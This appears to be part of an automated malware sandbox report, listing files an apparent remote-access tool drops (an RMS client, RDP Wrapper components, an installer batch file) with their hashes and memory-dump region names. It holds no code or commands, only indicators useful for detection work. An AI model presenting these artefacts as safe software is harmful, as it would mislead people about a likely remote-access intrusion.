| SHA256 | 04d5a7824dca49e7a1b170b3050b83a0eced83543bd860924de9faeb2c40a703 |
| SHA512 | a078f9a0d7979f793b4e0976fe369869e0e425ad139c86f3b9be2ae2386f7bc6f116c3ea8dc17ffbc0f003df0ef953535e638acf18e427f2797f46b1deae773c |
C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe
| MD5 | ef6333a371161c3244425b5355cf4a85 |
| SHA1 | dd9b0c91c929b505dae93fe7e80bec5954591d73 |
| SHA256 | 04d5a7824dca49e7a1b170b3050b83a0eced83543bd860924de9faeb2c40a703 |
| SHA512 | a078f9a0d7979f793b4e0976fe369869e0e425ad139c86f3b9be2ae2386f7bc6f116c3ea8dc17ffbc0f003df0ef953535e638acf18e427f2797f46b1deae773c |
memory/4716-171-0x0000000000C60000-0x0000000000C61000-memory.dmp
memory/2220-172-0x0000000000FB0000-0x0000000000FB1000-memory.dmp
memory/216-173-0x0000000002860000-0x0000000002861000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe
| MD5 | ef6333a371161c3244425b5355cf4a85 |
| SHA1 | dd9b0c91c929b505dae93fe7e80bec5954591d73 |
| SHA256 | 04d5a7824dca49e7a1b170b3050b83a0eced83543bd860924de9faeb2c40a703 |
| SHA512 | a078f9a0d7979f793b4e0976fe369869e0e425ad139c86f3b9be2ae2386f7bc6f116c3ea8dc17ffbc0f003df0ef953535e638acf18e427f2797f46b1deae773c |
\??\c:\program files\rdp wrapper\rdpwrap.dll
| MD5 | 461ade40b800ae80a40985594e1ac236 |
| SHA1 | b3892eef846c044a2b0785d54a432b3e93a968c8 |
| SHA256 | 798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4 |
| SHA512 | 421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26 |
C:\Program Files\RDP Wrapper\rdpwrap.dll
| MD5 | 461ade40b800ae80a40985594e1ac236 |
| SHA1 | b3892eef846c044a2b0785d54a432b3e93a968c8 |
| SHA256 | 798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4 |
| SHA512 | 421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26 |
\??\c:\program files\rdp wrapper\rdpwrap.ini
| MD5 | dddd741ab677bdac8dcd4fa0dda05da2 |
| SHA1 | 69d328c70046029a1866fd440c3e4a63563200f9 |
| SHA256 | 7d5655d5ec4defc2051aa5f582fac1031b142040c8eea840ff88887fe27b7668 |
| SHA512 | 6106252c718f7ca0486070c6f6c476bd47e6ae6a799cffd3fb437a5ce2b2a904e9cbe17342351353c594d7a8ae0ef0327752ff977dee1e69f0be7dc8e55cf4ec |
C:\Users\Admin\AppData\Local\Temp\RMS\remsetup.bat
| MD5 | 085edd6244d42ba399475686e9b71ea7 |
| SHA1 | 77068b9f3bd7fad105ae1e4f57a5c463e194deb3 |
| SHA256 | f910663b3b2f6d48473d91c716b139583bf292a0dfe592b10b0dc9795e0f77f9 |
| SHA512 | 877313fb1c30e6a0a372d602c5fbd02ed9c86b658a46a282bb912d8d642aa1e3ce2d0febc6d2b119e7ff37f0b8ce0e97267315d9ccab7eba4f8a797e345d519c |
C:\ProgramData\RDP\RDPWInst.exe
| MD5 | 9c257b1d15817a818a675749f0429130 |
| SHA1 | 234d14da613c1420ea17de60ab8c3621d1599f6f |
| SHA256 | b92962c2b4794ee418f0248743131d472a10ac96e520dda2afddf8ca3f3cd64c |
| SHA512 | b63fb6ba7b622f95fc151ca62c339368991c3c4c22e4bbe2305ac7172ee3f10e5049850e87cf3b87a13f4f15c516fbd20cadde9197064b659ffc66599e71d521 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\0270780F846F08BEFE0DD8112D932FEF
| MD5 | f441cd2e8380efed53a96cd5eb29feba |
| SHA1 | 4dcec4a89e32441789a45417c698a9ed48935d21 |
| SHA256 | 97889237ab2ec0c77e48520bdb9d6a9ab97ccf0dcc575c5f43ba04abdf03eef7 |
| SHA512 | a9ff62495a45ddc6daaf0c1d14a5996fde8d2387b3297cb6b888bda24f15194ba515727de36d420d97790a3c7ee4f017501495cb08044278629edb320184fc23 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\0270780F846F08BEFE0DD8112D932FEF
| MD5 | 5d4099f3e5e6f20d1f07a5a49b9093c5 |
| SHA1 | ab073ccc76d0175d4790d75ccc82e35c054ad9cc |
| SHA256 | 324af72c7d8b7743b23a1632d9ffb3dca05c227f7152805c1b7669561378eafc |
| SHA512 | 29f6798995b5e18f5cca70e098096a463fee2805091843585d1913de6b8be785ff7479b0107d2b0bcc5961aec2e5af86c6bfd78493601dfc289db0ccc5746d1d |